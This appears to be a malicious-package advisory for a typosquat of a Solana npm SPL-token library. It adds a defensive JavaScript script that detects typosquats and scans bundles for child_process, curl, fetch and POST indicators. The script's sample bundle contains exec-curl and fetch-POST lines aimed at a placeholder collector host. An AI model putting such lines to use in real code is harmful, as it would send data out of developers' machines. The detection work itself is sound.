MAL-2026-5787
Malicious code in @solana-labs/spl-toke (npm)
Details
## Source: amazon-inspector (490ce5d7e43d8a79aa85bbd24e7140ed074eee472f375092ab9b4cd650ce41f8)

Package name `@solana-labs/spl-toke` is a one-character omission of the legitimate `@solana-labs/spl-token` package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of `require('child_process')`, `curl` invocations, `fetch(` calls, and `POST` request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess and outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.
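The two signals in the analysis above (a near-miss of a legitimate scoped name, and subprocess plus outbound-HTTP primitives co-located in a bundle that should be a thin client) can both be checked mechanically before install. The script below is an added example, not code from the advisory, from amazon-inspector, or from Solana Labs. The allow-list `KNOWN_GOOD`, the constructed `SAMPLE_BUNDLE` text, and the window size and threshold in `scanBundle` are assumptions for illustration; a real deployment would load the allow-list from a vetted policy file and run the scan over each installed package's `lib/` output.

```javascript
// Added example (not from the advisory or Solana Labs). Two defender-side checks:
//  1. checkTyposquat: flag dependency names within a small edit distance of an
//     allow-listed legitimate package but not identical to it.
//  2. scanBundle: flag windows of a bundled file where several distinct
//     "dropper-shaped" indicators (child_process, curl, fetch, POST) co-occur.

// Constructed allow-list of legitimate scoped packages (assumption: a real one
// would come from a reviewed policy file or registry mirror).
const KNOWN_GOOD = ['@solana-labs/spl-token'];

// Classic Levenshtein edit distance (insert / delete / substitute, cost 1 each),
// computed with a single rolling row.
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0]; // d[i-1][j-1]
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j]; // d[i-1][j], becomes next diag
      prev[j] = Math.min(
        prev[j] + 1,                              // delete a[i-1]
        prev[j - 1] + 1,                          // insert b[j-1]
        diag + (a[i - 1] === b[j - 1] ? 0 : 1),   // substitute
      );
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Returns null for an exact allow-listed name or an unrelated name; otherwise
// the closest allow-listed look-alike within maxDistance edits.
function checkTyposquat(name, allowList = KNOWN_GOOD, maxDistance = 2) {
  if (allowList.includes(name)) return null;
  let best = null;
  for (const good of allowList) {
    const d = editDistance(name, good);
    if (d <= maxDistance && (best === null || d < best.distance)) {
      best = { name, lookalike: good, distance: d };
    }
  }
  return best;
}

function auditDependencies(depNames) {
  return depNames.map((n) => checkTyposquat(n)).filter(Boolean);
}

// Indicators cited in the advisory. Each alone is common in benign code; the
// signal is several kinds appearing close together in a supposed RPC client.
const INDICATORS = {
  child_process: /require\(\s*['"]child_process['"]\s*\)/,
  curl: /\bcurl\b/,
  fetch: /\bfetch\s*\(/,
  post: /\bPOST\b/,
};

// Splits the bundle into fixed windows of `windowLines` lines and flags every
// window containing at least `minKinds` distinct indicator kinds.
function scanBundle(text, windowLines = 200, minKinds = 3) {
  const lines = text.split('\n');
  const perLine = lines.map((line) =>
    Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(line)));
  const kindsSeen = new Set(perLine.flat());
  const flaggedWindows = [];
  for (let start = 0; start < lines.length; start += windowLines) {
    const kinds = new Set(perLine.slice(start, start + windowLines).flat());
    if (kinds.size >= minKinds) {
      flaggedWindows.push({ startLine: start + 1, kinds: [...kinds].sort() });
    }
  }
  return {
    kindsSeen: [...kindsSeen].sort(),
    flaggedWindows,
    suspicious: flaggedWindows.length > 0,
  };
}

// Constructed sample bundle text mimicking the shape described in the advisory
// (placeholder host, not a real endpoint).
const SAMPLE_BUNDLE = [
  "'use strict';",
  'function getMint(conn, addr) { return conn.getAccountInfo(addr); }',
  "const cp = require('child_process');",
  "cp.exec('curl -s https://collector.example.invalid/');",
  "fetch('https://collector.example.invalid/', { method: 'POST', body: data });",
].join('\n');

function runDemo() {
  const deps = ['@solana-labs/spl-toke', '@solana-labs/spl-token', 'lodash'];
  const findings = { typosquats: auditDependencies(deps), bundle: scanBundle(SAMPLE_BUNDLE) };
  console.log(JSON.stringify(findings, null, 2));
  return findings;
}

runDemo();
```

In CI this would run over the names in `package-lock.json` (or the lockfile's resolved packages) and over each installed package's bundled entry points; a typosquat hit or a flagged window should fail the build for human review rather than auto-block, since legitimate CLI wrappers also spawn processes and post to HTTP endpoints.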
Affected packages
No fixed version published yet for @solana-labs/spl-toke (npm). Pin to a known-safe version or switch to an alternative.
References
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.10 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.98.112 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.5 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.6 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.7 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.0 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.98.111 [PACKAGE]
- https://www.npmjs.com/package/@solana-labs/spl-toke/v/1.0.8 [PACKAGE]